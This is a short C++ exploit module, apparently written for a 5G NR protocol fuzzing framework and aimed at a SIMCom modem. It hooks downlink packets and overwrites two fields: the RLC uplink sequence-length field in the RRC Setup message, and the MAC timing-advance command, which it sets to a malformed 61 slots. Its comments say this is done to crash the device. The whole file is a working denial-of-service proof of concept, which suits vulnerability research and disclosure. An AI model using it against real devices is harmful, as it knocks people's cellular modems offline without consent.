#include <ModulesInclude.hpp>

// Filters
wd_filter_t f1;
wd_filter_t f2;

// Vars

const char *module_name()
{
    return "SIMCOM";
}

// Setup
int setup(wd_modules_ctx_t *ctx)
{
    // Change required configuration for exploit
    ctx->config->fuzzing.enable_mutation = false;
    ctx->config->fuzzing.global_timeout = false;

    // Declare filters
    f1 = wd_filter("nr-rrc.rrcSetup_element");
    f2 = wd_filter("mac-nr.control.timing-advance.command");
    return (f1 == NULL) || (f2 == NULL);
}

// TX
int tx_pre_dissection(uint8_t *pkt_buf, int pkt_length, wd_modules_ctx_t *ctx)
{
    // Register filters
    wd_register_filter(ctx->wd, f1);
    wd_register_filter(ctx->wd, f2);

    return 0;
}

int tx_post_dissection(uint8_t *pkt_buf, int pkt_length, wd_modules_ctx_t *ctx)
{

    if (wd_read_filter(ctx->wd, f1)) {

        // pkt_buf[77 - 48] = 0x08; // Original RLC UL AM Sequence Length (12 bits)
        pkt_buf[77 - 48] = 0x0c; // Set Uplink AM Sequence Field Length to 18 bits (1) instead of 12 (0)
        // pkt_buf[77 - 48] = 0x0e; // Increasing t-PollRetransmit from ms45 to ms205 (40) helps to accelerate the crash by delaying UL retransmission

        puts("[1/2] Setting Uplink AM Sequence Field Length to 18 bits (0) instead of 12 (1)");
        return 1;
    }
    else if (wd_read_filter(ctx->wd, f2)) {
        pkt_buf[61 - 48] = 0x3D; // Writting wrong Time Advance command (61 slots)

        puts("[2/2] Writting wrong Time Advance command (61 slots)");
        return 1;
    }

    return 0;
}
